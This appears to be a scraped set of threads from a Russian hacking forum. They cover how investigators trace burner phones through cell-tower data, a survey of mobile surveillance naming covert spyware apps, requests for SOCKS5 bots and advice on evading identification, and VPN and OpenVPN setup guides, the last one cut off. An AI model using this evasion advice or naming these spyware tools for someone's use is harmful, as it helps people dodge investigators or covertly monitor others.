Да что там писать на целый пост то. Пилим список всех симок, "засвеченых" в одной БС вместе с искомым "левым" номером, делаем десяток таких "снимков" (с разных БС), находим номер, который всегда оказывается в списке с искомым, это и будет основной телефон нашего кулхацкера. Едем в гости. Ну это если хацкер взял левый телефон, если же он в свой пихнул левую симку, то по имею пробить и готово. А если преступник - не дебил, то он не носит свой телефон с левым и не включает левый рядом с основным или дома. Такого только на горячую ловить, пока левый телефон не был скинут в реку.

Click to expand...

Выше давал ссылку ссылку на СТС №7, так вот ваш телефон постоянно ведёт обмен с базовыми станциями техническими данными, в этих данных передаются коды LAC и CID по которым можно определить точное местоположение (чуть менее точно, чем в GPS).

Таким образом, у правоохранителей есть возможность установить весь маршрут передвижений мобильного телефона, пока он включен.

Что это даёт для идентификации:

А) Передвижение подозреваемого по личным делам с «преступным» мобильником

Б) Совпадение координат «преступного» и настоящего мобильника злоумышленника

В) Из истории Москва/Тула/Серпухов/Ярославль можно посмотреть кто в определённое время ехал Серпухов-Ярославль. Сложно ведь без навигатора…

Г) Установить другие телефоны – свидетелей соучастников, которые были рядом с преступником.

Д) Другие методы, исходя из описанных возможностей.

Вариант 4 (сложный)

Вы совсем крутой кулхацкер – левый мобильник, левая карта, личного телефона нет совсем, едете по бумажным картам, преступную мобилку сожгли. Вас не найдут? Если очень надо, то и в данном случае тоже найдут.

Неросети. По закону (Яровая привет), операторы хранят ваши разговоры, вроде около 3х месяцев. У нас есть голос преступника, при наличии записи кучи телефонных переговоров и технологий на базе нейросетей и это вполне реально. Вот, к примеру, статья для размышлений по этому поводу: https://republic.ru/posts/86821, При этом идентифицировать источник звонка было нельзя: http://www.politonline.ru/interpretation/22891657.html

Отмечу, что всё что все описанные технологии видел лично, в разработке или внедрении элементов некоторых из них принимал непосредственное участие.

Могу написать почему при наличии таких возможностей преступников не ловят и сажают пачками. Но это если кому-то будет очень интересно.

Мобильная паранойя: 10 новых фактов о том, как носимые устройства следят за тобой

ID: 676533bbb4103b69df371d6a
Thread ID: 26881
Created: 2018-12-13T17:26:51+0000
Last Post: 2019-02-25T13:09:43+0000
Author: tabac
Replies: 16 Views: 4K

Вот уже двадцать пять лет хакеры непрерывно бьют тревогу: наша частная жизнь, приватность, право на анонимность, право на конфиденциальность переписки атакуются, и с каждым годом все интенсивнее. Эпоха тотального контроля уже на пороге, но большинство людей это не беспокоит — даже ошеломляющие откровения Сноудена широкими массами воспринимаются как обычный проходной скандальчик от какого-то парня.
Что же остается нам, хакерам? Информировать. На конференциях по безопасности рассказывают о все более изощренных угрозах — мы отобрали десять докладов, которые посвящены новейшим веяниям в области мобильного шпионажа.

1. Гироскоп, который прослушивает

Современные смартфоны оснащены множеством сенсоров, которые позволяют реализовать богатый пользовательский интерфейс. В целом они полезны, но иногда могут (непреднамеренно, конечно) разглашать чувствительную информацию. Риски конфиденциальности, связанные с такими сенсорами, как микрофон, камера и GPS, очевидны и хорошо понятны, но оказывается, что и гироскоп с акселерометром тоже могут быть опасны, ведь даже Java-апплет на веб-сайте может измерять и сохранять показатели этих сенсоров.

Чем это грозит? Доступ к гироскопу и акселерометру позволяет: идентифицировать пользователя по шаблону его ходьбы (получаемому с акселерометра смартфона), считывать символы, введенные с клавиатуры, рядом с которой лежит смартфон, и даже прослушивать разговоры без доступа к настоящему микрофону — используя гироскоп в качестве грубого микрофона. Подробная инструкция о том, как все это сделать, находится в открытом доступе.

2. Батарейка, которая стучит

«Батарейка? Вы это серьезно? Парни, вы чего, при чем тут вообще аккумулятор моего мобильника?» Ладно-ладно, спокойно, начнем издалека.

Ты когда-нибудь задумывался, как твоя батарейка из мобильника узнаёт, когда ей прекратить зарядку, — если она подключена к сети, но мобильник выключен? Дело в том, что современный аккумулятор имеет встроенный микрокомпьютер, общающийся с зарядным устройством и мобильником. Смарт-аккумулятор, вернее встроенную в него «систему управления умной батарейкой» (SBS), можно полностью перепрограммировать.

Изначально такая возможность предусмотрена для того, чтобы SBS могла более точно измерять параметры батарейки и более адаптивно настраивать алгоритм зарядки (в зависимости от химических и других характеристик). Если злоумышленник сумеет изменить работу такого внутреннего микрокомпьютера, то это может привести к перегреву батарейки или даже к ее возгоранию. Также злоумышленник, завладевший доступом к микрокомпьютеру смарт-аккумулятора, получит возможность наблюдать за доверенными операциями с крипточипом смартфона (поскольку батарейка общается с операционной системой по «доверенному каналу»).

3. Скажи мне, сколько энергии потребляет твой телефон… и я скажу, где ты

Современные мобильные платформы, такие как Android, позволяют приложениям узнать совокупное потребление энергии на смартфоне. Эта информация считается безвредной, и поэтому ее чтение не требует прав привилегированного пользователя.

Чем это грозит? Всего лишь считывая совокупное потребление энергии смартфоном в течение нескольких минут, можно определить местоположение пользователя этого смартфона. Совокупные данные об энергопотреблении телефона чрезвычайно шумны из-за множества компонентов и приложений, которые одновременно потребляют электроэнергию. Тем не менее благодаря современным алгоритмам машинного обучения можно их отсеять и успешно определить местоположение смартфона. Подробная инструкция о том, как это сделать, находится в открытом доступе.

4. Wi-Fi читает по губам

Wi-Fi-сигналы могут «видеть» перемещение и местонахождение людей и «слышать» их разговоры — даже тех, у которых нет с собой никакой электроники. Это становится возможным благодаря продвинутым техникам радиокартографирования: крупнозернистое радиокартографирование позволяет «видеть», а мелкозернистое — даже и «слышать» (причем одновременно сразу нескольких людей).

Случай с Wi-Fi-видением более или менее ясен и поэтому не так интересен. Что же касается «Wi-Fi-слышания», то здесь секрет в профилировании движения ротовой полости. При этом Wi-Fi-сигнал улавливает характерное положение не только губ, но и зубов и языка. Кроме того, поскольку радиосигналы проходят через стены и другие физические препятствия, Wi-Fi может «слышать» разговоры даже за стеной. Для этого Wi-Fi-сигналу только надо найти рот человека, не спутав его при этом с мигающим глазом. Но эта задача вполне решаемая. Подробная инструкция о том, как приручить Wi-Fi (с применением машинного обучения и вейвлет-преобразований), находится в открытом доступе.

5. Электромагнитное поле — то еще палево

Indoor-локализация посредством фиксации смартфоном электромагнитного поля (электромагнитных отпечатков пальцев) — широко обсуждаемая технология последних лет. Она основана на том факте, что внутри разных помещений магнитное поле отличается в зависимости от природных и искусственных факторов: конструктивных особенностей стального или железобетонного каркаса, конструктивных особенностей электрической сети и так далее.

Таким образом, у каждого помещения есть свойуникальный электромагнитный отпечаток. Соответствующие профили магнитного поля могут использоваться в качестве отпечатков пальцев для indoor-локализации. Электромагнитная indoor- локализация постепенно вытесняет Wi-Fi-радиокартографирование, поскольку менее энергозатратна. Ведь для фиксации электромагнитного поля ничего, кроме смартфона, не нужно. А генерировать это поле не требуется — оно уже есть. Тогда как при Wi-Fi-радиокартографировании необходимо наличие нескольких приемников и передатчиков Wi-Fi-сигнала.

Критический комментарий
Чаще всего описанным выше методам для практической реализации не хватает точности. Им противостоят сильные помехи, низкая частота дискретизации и другие физические ограничения. Методы машинного обучения и фильтрации тоже не всесильны. Например, сейчас при помощи анализа распространения сигналов от разных точек доступа Wi-Fi можно определить число движущихся людей за стенкой. Неподвижные люди часто сливаются с мебелью. Оценить рост обнаруженных таким образом людей можно очень приблизительно, а их артикуляцию — невозможно физически. Не хватит разрешающей способности.

Система управления батарейкой слишком примитивна, чтобы заставить ее скомпрометировать криптографические ключи смартфона. Все-таки микроконтроллер — это не универсальный микропроцессор, который теоретически можно заставить выполнить любой набор команд.

Иначе говоря, вывести все это за рамки proof-of-concept крайне затруднительно — «Математическая теория связи» и другие книги Шеннона как бы намекают нам, что нельзя восстановить сложный сигнал (с высокой энтропией и частотой) по анализу побочных простых сигналов. Например, по стуку колес поезда можно получить примерное представление о его скорости, но нельзя узнать, какую радиостанцию слушает пассажир из третьего купе в пятом вагоне, каково содержимое его багажа и есть ли он вообще.

6. RFID-маячки — старая угроза на новый лад

Ни для кого не секрет, что RFID, эти крошечные компьютерные чипы, которые теперь имеют размеры меньше песчинки, — одно сплошное палево. Как тебе нравятся грабители, которые гуляют в центре города со сканером и ищут чипированные документы граждан из богатых стран, чтобы их ограбить? А ведь это уже реальность, поскольку при помощи недорогого спецоборудования RFID можно считывать с расстояния в двадцать метров.

Хозяева торговых сетей тоже могут почувствовать себя в числе первых скрипок на празднике тотального шпионажа, ведь у них на руках есть все возможности тебя мониторить — благодаря RFID-маячку каждый экземпляр товара имеет уникальный идентификатор. Этот идентификатор может быть легко связан с покупателем. Например, для определения «частого покупателя» при сканировании его кредитки.

RFID-чипы могут быть считаны с расстояния, прямо через одежду, кошелек или рюкзак — без твоего ведома и согласия. Мы, потребители, не можем знать, в каких продуктах есть эти чипы, а в каких нет. RFID-чипы могут быть хорошо спрятаны. Например, они могут быть зашиты в швы одежды, расположены между слоями картона, отлиты в пластмассе или резине, интегрированы в дизайн потребительской упаковки. Кроме того, необходимая для работы этих чипов антенна сейчас может просто печататься проводящими чернилами, что делает RFID- чипы практически незаметными. Некоторые компании даже экспериментируют с дизайном упаковки, которая сама по себе будет антенной.

В итоге в скором времени у потребителя не будет возможности узнавать, есть ли в приобретаемом им товаре RFID-маячок или нет.

7. Ультразвуковой заговор: uBeacons

Экосистема ультразвукового отслеживания (uBeacons) — относительно новая технология, которая использует аудиомаячки, не слышимые человеческим ухом, для отслеживания пользователей и устройств. uBeacons — это высокочастотные аудиомаячки, излучение которых фиксируется большинством коммерческих динамиков и микрофонов. Этот ультразвук — святой Грааль маркетологов, поскольку позволяет отслеживать действия пользователей на разных устройствах.

Например, зная, что дядя Вася только что посмотрел телевизионное объявление и сейчас уже сидит в интернете со своего смартфона (чтобы найти подарок на день рождения), рекламодатель может показывать релевантную контекстную рекламу. uBeacons могут быть встроены в веб-сайты или телевизионные объявления и могут быть собраны рекламными SDK, встроенными в приложения смартфонов. Особо любимое маркетологами преимущество uBeacons — эта технология дает высокую точность нацеливания объявлений, не требуя от пользователя каких-либо действий. Однако для этого необходимо, чтобы на мобильном устройстве пользователя был установлен uXDT-фреймворк. Суть работы uXDT-фреймворка заключается в том, что в мобильные приложения встраивают соответствующие аудиомаячки — чтобы следить за тем, что пользователь делает.

При этом разработчик мобильного приложения даже может не знать, что такой маячок спрятался в его проекте. Такое может произойти, например, когда он при разработке программного обеспечения пользовался «бесплатным SDK», где разработчик этого SDK ради дохода встроил ультразвуковой модуль в свою библиотеку. Рекламодатели используют uXDT для таргетинга пользователей следующим образом.

Сначала рекламодатель запускает объявление с элементами ультразвука: либо на TV, либо на сайте.
Как только объявление отображается, из динамика устройства издается короткая последовательность высокочастотных (то есть ультразвуковых) тонов. Этот высокочастотный тон немедленно захватывается uXDT-фреймворком на смартфоне пользователя.
Чтобы обеспечить такую функциональность, uXDT-фреймворк работает в фоновом режиме и периодически обращается к микрофону устройства для прослушивания ультразвуковых сигналов.

После того как такой сигнал зафиксирован, uXDT-фреймворк извлекает из него уникальный идентификатор объявления и сообщает об этом рекламодателю — вместе с уникальными идентификационными данными устройства и пользователя. Рекламодатель затем использует эту информацию, чтобы выявить интересы и предпочтения пользователя, и в соответствии с этим делает ему индивидуальное рекламное предложение: направляет целевую рекламу на устройство пользователя.

8. Враг из холодильника (и книжной полки)

В 1999 году Массачусетский университет инициировал проект Auto-ID, целью которого было создание «физически связанного мира», где каждый элемент на планете инвентаризован, каталогизирован и отслеживается. Сейчас существуют RFID-маячки размером 0,3 мм, тонкие, как человеческий волос. Они легко могут быть размещены в денежных банкнотах, что дает спецслужбам возможность следить за историей денежных операций. Такая инициатива исключает анонимность обмена наличными средствами.

«Холодильники, которые сообщают в супермаркет о своем содержимом». «Интерактивное телевидение, выбирающее релевантную для вас рекламу» (например, на основании содержимого вашего холодильника). Все это — реальность наших дней. Auto-ID, в сочетании с RFID-сканерами, установленными в книжных полках (так называемые смарт-полки), может предоставлять исчерпывающую информацию о поведении потенциальных потребителей. Более того, иногда такие RFID-сканеры устанавливаются в предметы интерьера даже без ведома конечного потребителя.

У тебя дома и в сумочке нет ни одного RFID-микрочипа? Подозрительный ты парень, потенциальный террорист.Сегодня правительственные спецслужбы всерьез размышляют над тем, чтобы «в целях противодействия терроризму» (ну, как обычно) оцифровать всю жизнедеятельность каждого человека и отслеживать ее в режиме реального времени.

Смотри, что пишут на эту тему умные люди.

«Ключ к победе над террористами — возможность оцифровать абсолютно всех людей и разместить их на нашем цифровом поле боя. Идентифицируя каждого человека и отслеживая его перемещение в режиме реального времени, мы будем способны сразу же узнавать о его подозрительной активности. А если человек не оцифрован, значит, он — потенциальный террорист. Оцифровать население можно, встраивая RFID-маячки: в документы, автомобильные права, библиотечные билеты, корпоративные удостоверения, паспорта, визы, номерные знаки и так далее. Полностью оцифровав население, мы будем знать, кому что принадлежит. Потом мы сможем, обрабатывая все эти данные на мощных компьютерах, выявлять подозрительную активность. Мы можем отслеживать людей внутри транспортных средств, посредством триангуляции RFID-маячков (использовать установку из трех RFID-сканеров, размещенных, например, в фонарных столбах). Все транспортные средства, перемещающиеся между городами, также должны иметь RFID-маячки (на водительских правах, документах). Когда эти транспортные средства будут сближаться с RFID-сканером, встроенным в дорожное асфальтовое покрытие, мы сможем идентифицировать как автомобиль, так и его текущего водителя. Таким образом мы сможем качественно выявлять подозрительную активность населения».

9. Тайная жизнь твоей SIM-карты

SIM-карта — это таинственный маленький компьютер в твоем кармане, который тебе неподконтролен. SIM-карта может намного больше, чем просто быть посредником при авторизации на твоем мобильнике. Простейшие приложения можно загружать и выполнять прямо на SIM-карте — отдельно от мобильника, даже не зная, какая на мобильнике операционная система. Эти приложения могут:

переходить по URL-адресам;
отправлять SMS;
инициировать и принимать вызовы;
подключать и использовать информационные службы;
запускать AT-команды на мобильнике.

Приложения на SIM-карту загружаются в «тихом режиме» — посредством пакетной передачи данных через удаленный доступ. Обновлять приложения на SIM-карте может либо мобильный оператор, либо злоумышленник, притворяющийся мобильным оператором (например, при помощи IMSI-перехватчика). Подробная инструкция о том, как это сделать, находится в открытом доступе.

10. Мобильные трояны, или старые технологии еще в строю
Источник: окружающая реальность

Новые технологии шагают по планете, не отменяя при этом проверенной классики — вредоносного ПО.

Существует несколько десятков шпионских программ, которые могут быть удаленно установлены на мобильник в «тихом режиме» и шпионить за его владельцем, не выдавая своего присутствия. Ранее считалось, что, придерживаясь так называемой гигиены кибербезопасности, можно надежно оградить себя от подобного вмешательства в свою личную жизнь. Однако сегодня жертвой мобильного шпионажа могут стать даже те, кто избегает рискованного поведения в Сети, кто использует самую современную защиту и самое свежее обновление программного обеспечения.

Благодаря последним средствам защиты часть программ-шпионов можно отследить. Однако для того, чтобы поддерживать эти средства защиты в актуальном состоянии, нужно уметь их настраивать. Ведь атакующие точно так же, как и безопасники, не сидят на месте и прикладывают значительные усилия, чтобы скрыть свои программы от автоматизированных систем защиты. При этом настраивать защиту с течением времени становится все сложнее, а проводить успешные атаки — все проще. В том числе потому, что с подачи западных спецслужб самые современные информационные технологии сегодня находятся в открытом доступе. В результате такой политики открытости возрастает риск использования хай-тек-игрушек насмотревшейся фильмов про хакеров молодежью, непредсказуемой и импульсивной.

Есть мнение, что широко разрекламированные сегодня утечки хай-тек-игрушек ЦРУ вовсе не демарш Сноудена и WikiLeaks, а контролируемая утечка информации, имеющая целью направить конкурентов по «гонке вооружений» в заведомо проигрышном направлении; чтобы они продолжали вкладывать время и деньги в инструменты, которые уже не обеспечивают конкурентного преимущества. Кибероперации и инфоцентрические войны уже не служат ключом к нему. Сегодня бал правят знаниецентрические войны, суть которых сводится к тому, что «людей ломают профессионалы, а не машины».

Таким образом, мы наблюдаем сегодня все возрастающую экспоненциальную асимметрию кибербезопасности: атакующие находятся в более выгодных условиях, чем защищающиеся. Ежегодный прирост мобильных угроз составляет 42%. Ниже приведены несколько примеров шпионских программ, которые распространяются как легальные — под видом так называемых систем родительского контроля и им подобных. Все они скрывают свои действия от владельца мобильника.

Neo-Call Spy. Первоначально созданная под Symbian, теперь работает также и на iPhone, BlackBerry, Android, Windows Phones. Отправляет информацию непосредственно на другой мобильник. Эта программа основана на номере IMEI, то есть злоумышленник должен знать свою цель. Программа отслеживает SMS, список звонков, местоположение; удаленно прослушивает, журналирует нажатия клавиш. Команды она получает с управляющего мобильника в скрытых SMS-сообщениях.

Mspy. Работает на смартфонах и планшетах. Позволяет следить за звонками, SMS, сообщениями электронной почты, местоположением GPS, историей просмотра, календарем, адресными книгами, IM-сообщениями; позволяет управлять установленными приложениями, просматривать мультимедиафайлы. Также имеет функции удаленного контроля, такие как полное стирание устройства и сбор подробной отчетности. Для сбора и предоставления информации использует безопасную учетную запись в интернете — при помощи архитектуры клиент-сервер, с веб-интерфейсом.

FlexiSpy. Эта программа изначально классифицирована как мобильный троян из-за ее агрессивного поведения; но затем она стала вести себя мягче, и ее из категории мобильных троянов вычеркнули. Она позволяет шпионить за мобильниками и планшетами. Предлагает порядка 130 функций, в том числе те, которыми оснащена Mspy. Из уникальных функций: доступ к видеокамере, просмотр обоев. Так же как и Mspy, для сбора и предоставления информации использует безопасную учетную запись в интернете — при помощи архитектуры клиент-сервер, с веб- интерфейсом.

Mobile Spy. Обладает большинством функций FlexiSpy; вдобавок может блокировать приложения, устанавливать новые приложения и в режиме реального времени взаимодействовать с панелью управления пользовательского интерфейса мобильника.

Higster Mobile. Простая в использовании программа для мониторинга: текстовые сообщения, запись телефонных переговоров, журналы звонков… все отправляется с телефона жертвы либо на электронную почту, либо на мобильник, либо на безопасную учетную запись в интернете.

All-in-one Spy Software. Высококачественное ПО для шпионажа за мобильником, развивается с 2006 года.

Spyera. Программа, устанавливаемая на смартфон, для контроля за всем происходящим на мобильнике. Тайно записывает все события (SMS, история вызовов, телефонная книга, местоположение, электронные письма, сообщения приложений, IM, чат Facebook, Skype и многое другое), которые происходят на телефоне, и доставляет эту информацию в защищенный веб-аккаунт.

SpyMaster. Наиболее эффективное и продвинутое программное обеспечение для мобильного шпионажа. Стопроцентно скрытый режим, не оставляет никаких шансов на свое обнаружение. По крайней мере, так утверждают разработчики.

Заключение.
Эпоха тотального цифрового контроля стоит на пороге, и, скорее всего, ее полноценный приход застанет уже нынешнее поколение. Бороться поздно, и похоже, что только здоровый пофигизм поможет обществу справиться с этой проблемой (да- да, игнорируя ее). Примеры его проявления мы уже, кстати, видим как со стороны «следящих», так и со стороны «поднадзорных».

Телеграм сливает данные

ID: 676533bbb4103b69df371d6d
Thread ID: 27794
Created: 2019-02-11T16:08:11+0000
Last Post: 2019-02-22T18:34:43+0000
Author: lukas
Replies: 17 Views: 4K

Ваша любимая телега сливают данные, что уже и так давно известно

Spoiler: скриншот

а теперь еще и блокирует каналы при нарушении (!) авторских прав... лол

кто еще или уже не пользуется жабой - тот полный лось

Как хакеры и спецслужбы взламывают VPN

ID: 676533bbb4103b69df371d8d
Thread ID: 26826
Created: 2018-12-10T02:38:44+0000
Last Post: 2018-12-10T02:38:44+0000
Author: Fogg
Prefix: Видео
Replies: 0 Views: 4K

Розыск и поимка владельца Silk Road. Отчет агента

ID: 676533bbb4103b69df371dae
Thread ID: 24688
Created: 2013-10-06T09:10:31+0000
Last Post: 2013-10-12T21:39:26+0000
Author: demien
Replies: 21 Views: 4K

сабж
Как то странно всё это (имею ввиду факты по которым задетектили перца)... Кто че думает?

3G модем, ВМ, VPN, Proxifier и анонимность

ID: 676533bbb4103b69df371db4
Thread ID: 20898
Created: 2011-01-02T00:14:17+0000
Last Post: 2013-03-24T18:37:40+0000
Author: LuxMarkiz
Replies: 13 Views: 4K

на основном компьютере установлена ВМ. к ВМ подключаю 3G модем. там же, на ВМ, установлен VPN и Proxifier. кроме того, на ВМ установлена программа CCTools (меняет ID железа). подскажите, все ли правильно делаю чтобы нигде не запалиться? или все-таки нужно VPN устанавливать на основной машине и 3G модем тогда подключать именно к основному компьютеру? будет ли в этом случае какая- то разница?
и еще, некоторые сайты, насколько я понимаю, палят по MAC-адресу устройства, через которое подключается Инет. а у 3G модема есть MAC-адрес? насколько я понимаю - нет, т.к. он подключается к USB порту? поправьте, если я не прав smile.gif так вот, нужно ли в этом случае установить программу, которая будет менять MAC-адрес?
короче, есть ВМ, 3G модем, VPN, Proxifier. как правильно все настроить? smile.gif

soks 5 bot

ID: 676533bbb4103b69df371db8
Thread ID: 18443
Created: 2009-10-05T21:01:45+0000
Last Post: 2012-05-18T06:53:32+0000
Author: Egelmeister
Replies: 8 Views: 4K

какой платный/приват сокс 5 бот посоветуете?

Proxy [L1+L2+L3]

ID: 676533bbb4103b69df371dcd
Thread ID: 17748
Created: 2009-06-10T10:45:07+0000
Last Post: 2009-06-10T10:45:07+0000
Author: penguen
Replies: 0 Views: 4K

Привет всем! Решил создать свой топик с проксиками. Чекаю их для себя каждый день и решил поделиться с Вами. Создаю отдельный топик, чтобы постоянно редактировать сообщения и не засорять чужие топики.

13-06-09 | [Update] L1+L2+L3|563

Скачать

======================

13-06-09 | [Update] Socks 4/5 (1362)
1362 green Socks
Checked & filtered with ProxyFire MasterSuite (Timeout: 8)

Скачать

13-06-09 | Special: Speed Socks / Timeout 3 (1.1k)
1104 fresh & fast Power Socks
Checked & filtered with ProxyFire MasterSuite (Timeout: 3)

Скачать

===============================

13-06-09 | [Update] SSL (HTTPS) Proxies (4.4k)
4425 fresh SSL proxies.

Checked & filtered with ProxyFire MasterSuite (Timeout 8)

Скачать

Удаленное рабочее пространство

ID: 676533bbb4103b69df371dd2
Thread ID: 16663
Created: 2009-01-17T15:14:04+0000
Last Post: 2009-04-27T10:08:03+0000
Author: ammok
Replies: 9 Views: 4K

Постараюсь быстро и в картинках изложить суть вопроса.
Кому может пригодиться этот обзор? - любому человеку который любит держать все по полочкам, от трейдера - до хакера и т.д.
В качестве рабочего пространства я подразумеваю сервер на платформе "Windows Server 2003", в моем случае это "Standart Edition".
Сервер нужен для постоянной работы в сети (сбор статистики, анализ данных и так далее), задача: "в короткие сроки запустить VPN службу, настроить сервер для безопасной удаленной работы".

Начать следует с отключения ненужных служб, для запуска VPN нам следует отключить службу "Брандмауэр Windows/Общий доступ к Интернету (ICS)", остальные службы отключайте в зависимости от поставленных целей на сервер, учтите, чем меньше служб работают, тем больше процессор работает над действительно нужными задачами.

Ниже на скриншотах видно процесс отключения службы.

Далее запустим службу маршрутизации для VPN.

В мастере выбираем нужную службу, но следует заметить что все зависит от конфигурации сервера, в моем случае я увидил ошибку, исправить ее не составило труда.

После настройки мастером запустится служба, а нам еще предстоит настройка. Зайдем в свойства нашего сервера и настроим параметры на вкладках.

На вкладке "IP" назначаем новый статический пул адресов.

На вкладке "Ведение журнала" указываем уровень ведения логов, я выбрал "Не записывать в журнал никаких событий", мне это совсем не нужно .

Дальше нам необходимо разрешить пользователям подключаться со своим логином и паролем к службе PPtP.
В зависимости от конфигурации сервера, нам понадобится оснастка, в моем случае это "Локальные пользователи и группы", а если сервер имеет доменную конфигурацию то понадобится оснастка "Active Directory - пользователи и компьютеры".
В свойствах необходимого нам пользователя (или группы), на вкладке "Входящие звонки" разрешим удаленный доступ.

Теперь проверяем сделанное, для начала создадим PPtP соединение, как я это делаю в моем варианте видно на скриншотах ниже, как создать подключение в Windows XP можно прочитать по адресу http://www1.himki.net/faq/settings/vpn/xp/.

Создаем подключение.

Вводим данные сервера и жмем кнопку "Подключить".

И теперь мы можем подключиться к удаленному рабочему столу через внутренний адрес, в моем случае это 10.0.0.1.

После всех этих движений мы получили удаленный VPN сервер, а так как на нем установлена OS Windows Server 2003 сервер может являться хорошей площадкой для работы 24/7.

В последствии я напишу еще пару обзоров в продолжение темы.

Специально для xss.is/, by ammok.

Настройка VPN на основе OpenVPN

ID: 676533bbb4103b69df371dde
Thread ID: 12068
Created: 2006-09-25T21:41:22+0000
Last Post: 2008-02-27T16:38:30+0000
Author: Robin Gud
Replies: 8 Views: 4K

1. Предисловие..
Для большинства присутсвующих здесь VPN озночает организация шифрованого соеденения до сервера и получение в конечном итоге интернета не со своего ip- адресса.. Чтож, об том как это реализовать и будет описано в этой статье. В частности будет так же расмотренна установка мобильного клиента(т.е. можно записать на флэшку, и подключаться к впн пару кликами)

Что нам нужно: шелл с правами рута, желательно дедик. Рассматривать будем сервер с ОС FreeBSD

2. Устанавливаем и конфигурируем OpenVPN
Эта часть статьи почти полностью написана KaDaBR'ой(vbs скрипты и не большие переделки конкретно под freebsd с меня)

2.1 Устанавливаем OpenVPN на сервер

wget http://openvpn.net/release/openvpn-2.0.7.tar.gz

tar xvzf ./openvpn-2.0.7.tar.gz

cd ./openvpn-2.0.7

./configure

make

make install

rehash

2.2 Создаём ключи

после успешного завершения всех операций необходимо создать сертефикаты и ключи
Заходим в папку с исходниками OpenVPN и в ней:

cd ./easy-rsa

ee ./vars (в этом файлике внизу изменяете данные для подписи ключей под

себя)
Внимание! Если у вас неустановлен баш, то перед следующими операциями нужно набрать в консоли "sh"

. ./vars (загружаем эти переменные в оболочку)

./clean-all (отчищаем от старых сертификатов и ключей папку keys и создаем

серийный и индексные файлы для новых ключей)

./build-ca (Создаем Certificate Authority для сервера)

./build-key-server server(Создаем сертификат X.509 для сервера)

./build-key client (Создаем сертификат X.509 для клиента)

Будьте внимательны при заполнени данных сертификатов, поле Common Name обязательно к заполнению, причем для сервера оно должно быть одно, а для клиента другое. Например в поле Common Name при генерации сертификата X.509 для сервера можно написать server, а для клиента соотвественно client

Создаем ключ Диффи Хельман(о нем можно почитать здесь: http://www.rsasecurity.com/rsalabs/node.asp?id=2248)

./build-dh

Теперь выходим из sh написав команду "exit"
И в конце создаем ключ для tls-аутификации

openvpn --genkey --secret keys/ta.key

После всех этих манипуляций в папке keys получается много файлов:

ca.crt - Главный CA сертификат, этот файл нужен и клиенту и серверу
dh1024.pem - ключ Диффи Хельман, этот файл нужен только серверу
server.crt - Сертификат сервера, нужен только серверу
server.key - Ключ сервера, нужен только серверу (СЕКРЕТНЫЙ файл)
client.crt - Сертификат клиента, нужен только клиенту
client.key - Ключ клиента, нужен только клиенту (СЕКРЕТНЫЙ файл)
ta.key - TLS-ключ, нужен и клиенту и серверу
Следовально серверу достаются файлы ca.crt, dh1024.pem, server.crt, server.key, ta.key, а клиентуca.crt, dh1024.pem,client.crt, client.key, ta.key

2.3 Настраиваем сервер

Файл конфигурации можно разместить где угодно, например в /etc/openvpn, так же для удобства скопируем туда все ключи(ca.crt, dh1024.pem, server.crt, server.key, ta.key).
Создаем конфигурационный файл openvpn.conf следующего содержимого:
proto udp #Сервер слушает только udp-порт
local 100.100.100.100 #IP, с которого принимаем подключения
dev tap #используемый тип устройства tap
port 1194 #используемый порт 1194
tls-server #включаем TLS аутификацию
tls-auth ta.key 0 #указываем tls-ключ, и указываем 0 для сервера, а 1 для клиента
ca ca.crt #указываем файл CA
cert server.crt #указываем файл с сертификатом сервера
key server.key #указываем файл с ключем сервера
dh dh1024.pem #указываем файл Диффи Хельман
mode server #включаем режим сервера
ifconfig 192.168.231.5 255.255.255.0 #задаем IP-адрес сервера и маску подсети виртуальной сети
ifconfig-pool 192.168.231.6 192.168.231.20 #задаем диапазон IP-адресов выдаваемых клиентам
push "route-gateway 192.168.231.5" #отправляем клиентам строку, с указанием шлюза
push "dhcp-option DNS 192.168.231.5" #задаём адрес dns-сервера
duplicate-cn #ВАЖНО! разрешаем пользоватся одним и тем же ключем, нескольким клиентам одновременно, иначе прийдется для всех клиентов генерировать отдельные сертификаты.
cipher DES-EDE3-CBC #включаем шифрацию пакетов Triple-DES
user nobody #устанавливаем OpenVPN-демону права пользователя nobody
group nobody
persist-tun #Не закрывать и переоткрывать TUN\TAP устройство, после получения SIGUSR1 или ping-restart
persist-key #Не перечитывать ключи после получения SIGUSR1 или ping-restart
comp-lzo #Включить сжатие траффика
keepalive 10 120 #Проверка жизни клиента каждые 10 секунд, если в течении 120 секунд не пришел ответ, то закрывается соединение
verb 3 #Уровень информации для отладки

Всё, сервер настроен, теперь мы его запускаем: openvpn vpn.conf(или то имя, которое вы дали конфигу)

Если vpn незапуститься, и ошибка будет что типа "непподерживаеться tun\tap устройство" то делаем kldload if_tap и загружаем заного

2.4 Настраиваем клиент под Windows

:zns5: Скачать клиент

Устанавливаем необходимые компоненты:

OpenVPN User-Space Components
OpenVPN GUI
OpenSSL DLLs
TAP-Win32 Virtual Ethernet Adapter

Теперь приступим к настройке клиента. Создадим конфигурационный файл openvpn.ovpn в папке config (Например C:\Program Files\OpenVPN\config). И скопируем туда же все необходимые ключи для работы (ca.crt, dh1024.pem, client.crt, client.key, ta.key).

Содержимое файла openvpn.ovpn:

client #указываем OpenVPN, что необходимо работать в режиме клиента
proto udp #указываем, что сервер работает через udp
remote x.x.x.x #хост, к которому присоединяемся
port 1194 #порт к которому следует подключатся
dev tap #используемый тип устройства tap
resolv-retry infinite #количество повторов соединения
redirect-gateway #ВАЖНО! переназначить стандартный шлюз на шлюз VPN
persist-tun #Не закрывать и переоткрывать TUN\TAP устройство, после получения SIGUSR1 или ping-restart
persist-key #Не перечитывать ключи после получения SIGUSR1 или ping-restart
tls-client #указываем, что подключение осуществляется по средствам tls-ключа
tls-auth ta.key 1 #указываем tls-ключ, и указываем 0 для сервера, а 1 для клиента
dh dh1024.pem #указываем файл Диффи Хельман
ca ca.crt #указываем файл CA
cert client.crt #указываем файл с сертификатом клиента
key client.key #указываем файл с ключем клиента
cipher DES-EDE3-CBC # Triple-DES #включаем шифрацию пакетов
comp-lzo #Включить сжатие траффика
verb 3 #Уровень информации для отладки

Теперь можно проверить работу клиента.

Нажимаем правой кнопкой мышки по значку в трее. и выбираем Connect

Сначала вылезет вот такое окошко:

Следом если пройдет все хорошо, то в трее загорится зеленый значек с ip- адресом виртуального VPN соединения.

Отключаемся тем же путем что и соединялись только выбрав Disсonnect.

2.5 Мобилизация

Теперь приступим к мобилизации нашего OpenVPN дистрибутива.
Для начала скопируем на переносной носитель информации всю папку OpenVPN (C:\Program Files\OpenVPN)
Далее создадим в корне переносного носителя три VB-скрипта:

InstallVPN.vbs:

Code:Copy to clipboard

